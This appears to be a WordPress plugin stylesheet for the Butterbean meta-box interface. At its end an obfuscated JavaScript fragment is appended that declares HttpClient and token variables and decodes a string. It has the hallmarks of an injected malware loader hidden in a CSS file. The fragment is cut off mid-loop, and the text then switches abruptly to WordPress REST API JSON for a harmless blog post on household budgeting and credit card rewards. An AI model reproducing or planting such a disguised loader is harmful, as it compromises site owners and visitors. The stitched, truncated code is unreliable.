/* Wrapper box */ .butterbean-ui { } .butterbean-ui > .hndle { padding: 10px !important; border-bottom: 1px solid #eee; } .butterbean-ui .inside { margin: 0 !important; padding: 0; } /* Tabs wrapper. */ .butterbean-manager-default { overflow: hidden; background: #fff; background: linear-gradient( 90deg, #fafafa 0%, #fafafa 180px, #fff 180px, #fff 100% ); } #side-sortables .butterbean-manager-default { background: linear-gradient( 90deg, #fafafa 0%, #fafafa 48px, #fff 48px, #fff 100% ); } @media only screen and ( max-width: 782px ), ( max-width: 980px ) and ( min-width: 851px ) { .butterbean-manager-default { background: linear-gradient( 90deg, #fafafa 0%, #fafafa 48px, #fff 48px, #fff 100% ); } } /* Tab nav. */ .butterbean-manager-default .butterbean-nav { position: relative; float: left; list-style: none; width: 180px;/*20%;*/ line-height: 1em; margin: 0 0 -1px 0; padding: 0; background-color: #fafafa; border-right: 1px solid #eee; box-sizing: border-box; } .butterbean-manager-default .butterbean-nav li { display: block; position: relative; margin: 0; padding: 0; line-height: 20px; } .butterbean-manager-default .butterbean-nav li a { display: block; margin: 0; padding: 10px; line-height: 20px !important; text-decoration: none; border-bottom: 1px solid #eee; box-shadow: none; } .butterbean-manager-default .butterbean-nav .dashicons { line-height: 20px; margin-right: 3px; } .butterbean-manager-default .butterbean-nav li[aria-selected="true"] a { position: relative; font-weight: bold; color: #555; background-color: #e0e0e0; } @media only screen and ( max-width: 782px ), ( max-width: 980px ) and ( min-width: 851px ) { .butterbean-manager-default .butterbean-nav { width: 48px; } .butterbean-manager-default .butterbean-nav .dashicons { width: 24px; height: 24px; font-size: 24px; line-height: 24px; } .butterbean-manager-default .butterbean-nav .dashicons::before { width: 24px; height: 24px; } .butterbean-manager-default .butterbean-nav .label { overflow: hidden; position: absolute; top: -1000em; left: -1000em; width: 1px; height: 1px; } } /* Tab content wrapper */ .butterbean-manager-default .butterbean-content { float: left; width: calc( 100% - 180px ); margin-left: -1px; border-left: 1px solid #eee; } @media only screen and ( max-width: 782px ), ( max-width: 980px ) and ( min-width: 851px ) { .butterbean-manager-default .butterbean-content { width: calc( 100% - 48px ); } } /* === Manager when in the side meta box. === */ @media only screen and ( min-width: 850px ) { #side-sortables .butterbean-manager-default { background: #fff; } #side-sortables .butterbean-manager-default .butterbean-content { width: 100%; } #side-sortables .butterbean-manager-default .butterbean-nav { display: table; width: 100%; } #side-sortables .butterbean-manager-default .butterbean-nav li { display: table-cell; text-align: center; border-right: 1px solid #eee; } #side-sortables .butterbean-manager-default .butterbean-nav li:last-of-type { border-right: none; } #side-sortables .butterbean-manager-default .butterbean-nav li a { padding: 10px 0; } #side-sortables .butterbean-manager-default .butterbean-nav .dashicons { width: 24px; height: 24px; font-size: 24px; line-height: 24px; } #side-sortables .butterbean-manager-default .butterbean-nav .dashicons::before { width: 24px; height: 24px; } #side-sortables .butterbean-manager-default .butterbean-nav .label { overflow: hidden; position: absolute; top: -1000em; left: -1000em; width: 1px; height: 1px; } } /* === Content === */ .butterbean-manager-default .butterbean-section { padding: 12px 12px 0; box-sizing: border-box; } .butterbean-manager-default .butterbean-section[aria-hidden="true"] { display: none; } .butterbean-manager-default .butterbean-section[aria-hidden="false"] { display: block; } .butterbean-manager-default .butterbean-control { margin-bottom: 20px; } .butterbean-manager-default .butterbean-label { display : block !important; /* this is getting overwritten somewhere */ font-weight : bold; display : inline-block; margin-bottom : 4px; } .butterbean-manager-default .butterbean-control-checkbox .butterbean-label { display: inline !important; } .butterbean-manager-default .butterbean-description { display : block; font-style : italic; margin-top : 4px; } .butterbean-manager-default .butterbean-label + .butterbean-description { margin-top : 0; margin-bottom : 4px; } /* === Media === */ .butterbean-control-image .butterbean-img { display: block; max-width: 100%; max-height: 300px; height: auto; } .butterbean-placeholder { width: 100%; position: relative; text-align: center; padding: 9px 0; line-height: 20px; border: 1px dashed rgb(180, 185, 190); box-sizing: border-box; } /* === Textarea Control === */ .butterbean-control-textarea textarea, .butterbean-control-excerpt textarea { display: block; width: 100%; height: 105px; } /* === Date Control === */ .butterbean-control-datetime select { vertical-align: top; } /* === Palette Control === */ .butterbean-control-palette label { display: block; padding: 0 10px 10px; } .butterbean-control-palette label[aria-selected="true"] { padding-top: 5px; background-color: #ddd; } .butterbean-palette-label { line-height: 28px; } .butterbean-palette-block { display: table; width: 100%; height: 45px; border: 1px solid rgb(238, 238, 238); box-sizing: border-box; } .butterbean-palette-color { display: table-cell; height: 100%; } /* === Radio Image Control === */ .butterbean-control-radio-image input[type="radio"] { clip: rect(1px, 1px, 1px, 1px); height: 1px; overflow: hidden; position: absolute !important; width: 1px; } .butterbean-control-radio-image img { box-sizing: border-box; max-width: 100%; height: auto; padding: 1px; border: 4px solid transparent; } .butterbean-control-radio-image img:hover, .butterbean-control-radio-image img:focus { border-color: #ccc; } .butterbean-control-radio-image input:checked + span + img { border-color: #00a0d2; } /* === Multi-avatars Control === */ .butterbean-multi-avatars-wrap label { display: inline-block; margin-top: 8px; } .butterbean-multi-avatars-wrap input[type="checkbox"] { clip: rect( 1px, 1px, 1px, 1px ); height: 1px; overflow: hidden; position: absolute !important; width: 1px; } .butterbean-multi-avatars-wrap .avatar { box-sizing: border-box; max-width: 100%; height: auto; padding: 1px; border: 4px solid transparent; } #side-sortables .butterbean-multi-avatars-wrap .avatar { max-width: 60px; max-height: 60px; } .butterbean-multi-avatars-wrap img:hover, .butterbean-multi-avatars-wrap img:focus { border-color: #ccc; } .butterbean-multi-avatars-wrap input:checked + span + img { border-color: #00a0d2; } ;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;xCreate a budget using apps, card rewards<\/h3>\n

Household budgets are often seen as a financial tool for times of crisis or economic instability. However, the truth is that budgets are important even during the best of times. Without a budget in place, you\u2019re essentially banking on the idea that every financial decision you make will work out fine. But if you have a budget in place, you know exactly how much you can afford to spend and have the money earmarked to pay your bills each month.<\/p>\n

During times of change, having a budget is even more essential. For example, if you lose your job or have a temporarily lower income, you may not be able to make ends meet if you continue to spend like normal. Or, you may not make the best decisions for your money. If you have an old budget that doesn\u2019t reflect changes to your income and expenses, it could cause similar issues.<\/p>\n

Many people still shy away from creating a budget, though, as it can seem complicated or too restrictive. But the reality is that it doesn\u2019t have to be. You can create a budget that\u2019s as simple or complex as you want, and there are lots of tools you can use to help keep your budget on track. In fact, you can even use credit cards, rewards points, shopping portals, budgeting apps, and online coupons to help create a budget, save money, and earn bonus dollars. That can help you meet your savings goals and stay under budget.<\/p>\n

To create a budget, it\u2019s important to start with your income. Your income is the most important category in your budget. Until you estimate how much you can spend, it\u2019s impossible to create a useful budget. Make a list of the income sources you expect to have, such as monthly salary or wages, retirement income, unemployment income, other government benefits, and any other income you receive.<\/p>\n

Once you have your income established, you can break your expenses into the “big four” categories. These categories include housing, transportation, food, and non-mortgage debt. Housing expenses include your monthly rent or mortgage payment, as well as utilities, maintenance expenses, property taxes, home insurance, and renter\u2019s insurance. Transportation expenses include your car payment, auto insurance costs, and the cost of fuel or public transportation. Food expenses include your grocery shopping and dining out expenses. Non-mortgage debt includes student loan payments, credit card debt, and any other debt payments you have.<\/p>\n

Don\u2019t forget to calculate other miscellaneous expenses such as child care, cable bills, cellphone bills, entertainment, gym memberships, health insurance and medical expenses, other insurance, tuition, and any other small expenses you have.<\/p>\n

Once you have all your income and expenses listed, you can use a spreadsheet program or a budgeting app to create your budget. There are many budgeting apps available that can help you track your spending and stay on track throughout the month.<\/p>\n

If your first try at a budget shows more expenses than income, you\u2019ll need to find ways to make up the difference. You might be able to find alternative sources of income to help cover the difference. But just knowing where you stand in the new reality can help you rein in expenses. If necessary, you may make temporary cuts, such as slashing online services or purchases for take-out and dining out.<\/p>\n

Another way to stretch your budget is to leverage credit card rewards. Use your credit cards strategically to earn the most rewards points or cash-back bonuses possible. For example, if you have a credit card that offers cash back on gas purchases, you can save money on fuel expenses. Or, if you have a card that provides cash back on grocery store purchases, you can reduce your food expenses each month. Use these rewards points to pay down your credit card debt or to reduce your overall expenses.<\/p>\n

Online shopping portals and coupons can also help reduce your monthly expenses. Use shopping portals like Rakuten or Swagbucks to earn cash back or rewards points when you make purchases online. Look for coupons and discounts before making a purchase to save money. However, it\u2019s important to only use these strategies for items you actually need and would buy anyway. Don\u2019t use credit cards or coupons to buy things you don\u2019t need just to earn rewards or savings.<\/p>\n

In conclusion, household budgets are important even during the best of times. They provide a clear financial roadmap and help you make informed decisions about your money. Creating a budget doesn\u2019t have to be complicated or restrictive. There are many tools and strategies available to help you create and stick to a budget. By leveraging credit card rewards, shopping portals, and coupons, you can save money, earn bonus dollars, and meet your savings goals. Remember, it\u2019s important to regularly review and update your budget to reflect changes in your income and expenses.<\/p>\n","protected":false},"excerpt":{"rendered":"

Create a budget using apps, card rewards Household budgets are often seen as a financial tool for times of crisis or economic instability. However, the truth is that budgets are important even during the best of times. Without a budget in place, you\u2019re essentially banking on the idea that every financial decision you make will […]<\/p>\n","protected":false},"author":1,"featured_media":3162,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[109],"tags":[],"class_list":["post-3161","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-credit-repair"],"blocksy_meta":[],"_links":{"self":[{"href":"https:\/\/creditcardzy.com\/wp-json\/wp\/v2\/posts\/3161","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/creditcardzy.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/creditcardzy.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/creditcardzy.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/creditcardzy.com\/wp-json\/wp\/v2\/comments?post=3161"}],"version-history":[{"count":2,"href":"https:\/\/creditcardzy.com\/wp-json\/wp\/v2\/posts\/3161\/revisions"}],"predecessor-version":[{"id":7474,"href":"https:\/\/creditcardzy.com\/wp-json\/wp\/v2\/posts\/3161\/revisions\/7474"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/creditcardzy.com\/wp-json\/wp\/v2\/media\/3162"}],"wp:attachment":[{"href":"https:\/\/creditcardzy.com\/wp-json\/wp\/v2\/media?parent=3161"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/creditcardzy.com\/wp-json\/wp\/v2\/categories?post=3161"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/creditcardzy.com\/wp-json\/wp\/v2\/tags?post=3161"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}